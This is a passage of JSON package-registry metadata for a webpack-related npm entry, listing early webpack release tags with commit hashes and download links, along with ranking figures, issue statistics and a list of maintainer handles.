t","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:35:50.627Z","dependent_packages_count":0,"downloads":3,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":59.88173098450381,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07882114490654064,"forks_count":0.39273321703433056,"docker_downloads_count":null,"average":24.49719814785688},"purl":"pkg:npm/webpack-4.17.1","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-4.17.1","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-4.17.1","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-4.17.1/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.e